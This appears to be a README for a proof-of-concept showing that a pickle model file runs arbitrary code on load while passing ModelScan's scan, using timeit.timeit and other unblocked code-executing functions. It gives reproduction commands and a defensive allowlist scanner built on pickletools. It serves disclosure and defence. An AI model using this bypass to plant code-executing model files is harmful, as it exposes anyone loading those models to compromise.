
ModelScan Scanner Bypass PoC

Proof-of-concept model files that bypass ModelScan's pickle scanner while executing arbitrary code on load.

Files

  • malicious_timeit.pkl - Pickle file using the timeit.timeit() bypass
  • malicious_timeit.joblib - Joblib file using the timeit.timeit() bypass
  • create_poc.py - Script to recreate the PoC files

Reproduction

# 1. Scan with ModelScan - reports clean
pip install modelscan
modelscan --path malicious_timeit.pkl
# Output: "No issues found!"

# 2. Load the file - executes arbitrary code
python3 -c "import pickle; pickle.load(open('malicious_timeit.pkl', 'rb'))"
# Output: uid=1000(user) ...  (id command executed)

# 3. Same for joblib
python3 -c "import joblib; joblib.load('malicious_timeit.joblib')"
# Output: uid=1000(user) ...  (id command executed)

Bypass Technique

The pickle payload uses timeit.timeit(stmt) which accepts a Python code string and executes it. The timeit module is not in ModelScan's unsafe_globals blocklist (modelscan/settings.py), so the scanner does not flag it.

Additional unblocked modules that can execute code strings: cProfile.run(), profile.run(), timeit.repeat().
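As an added defensive check that is not part of this repository or of ModelScan: a static walk over the pickle opcode stream with pickletools that reports every module reference outside an allowlist, rather than checking a blocklist, so code-running helpers such as timeit.timeit are surfaced without ever loading the file. The allowlist and the two sample streams are assumptions; the timeit sample merely references the function (no REDUCE opcode), so nothing runs on load.

```python
import collections
import io
import pickle
import pickletools
import timeit

# Top-level packages a serialized model is expected to reference. Any other
# module is reported, so timeit, cProfile or profile are caught even though no
# blocklist names them. (Assumed allowlist; adjust to the framework in use.)
ALLOWED_PACKAGES = {"builtins", "collections", "numpy", "torch"}
# Opcodes that invoke a callable while unpickling.
CALL_OPCODES = {"REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}
STRING_OPCODES = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
                  "BINUNICODE", "BINUNICODE8", "SHORT_BINUNICODE"}


def scan_pickle(data: bytes) -> dict:
    """Walk the opcode stream (no unpickling) and collect every module.attr the
    stream would import, flagging those whose package is not allowlisted."""
    strings, memo, last = [], [], None  # last = string arg of previous opcode
    refs, flagged, calls = [], [], 0
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        name = op.name
        if name in STRING_OPCODES:
            strings.append(arg)
        elif name == "MEMOIZE":            # protocol 4: memo index == len(memo)
            memo.append(last)
        elif name in ("BINGET", "LONG_BINGET") and arg < len(memo) \
                and isinstance(memo[arg], str):
            strings.append(memo[arg])      # memoized module/name reused later
        elif name in ("GLOBAL", "STACK_GLOBAL"):
            # GLOBAL carries "module name" as text; STACK_GLOBAL takes the two
            # most recently pushed strings (module, then attribute).
            module, attr = arg.split(" ", 1) if name == "GLOBAL" else strings[-2:]
            refs.append(f"{module}.{attr}")
            if module.split(".")[0] not in ALLOWED_PACKAGES:
                flagged.append(f"{module}.{attr}")
        elif name in CALL_OPCODES:
            calls += 1
        last = arg if name in STRING_OPCODES else None
    return {"refs": refs, "flagged": flagged, "calls": calls, "safe": not flagged}


# Constructed samples: a benign container, and an inert stream that only
# references timeit.timeit (no call opcode) to show the allowlist catching it.
BENIGN = pickle.dumps(collections.OrderedDict(w=[0.1, 0.2]), protocol=4)
INERT_TIMEIT_REF = pickle.dumps(timeit.timeit, protocol=4)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("timeit-ref", INERT_TIMEIT_REF)):
        print(label, scan_pickle(blob))
```

The same walk can be applied to the pickle member inside a joblib or zip-based model archive before any load call.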
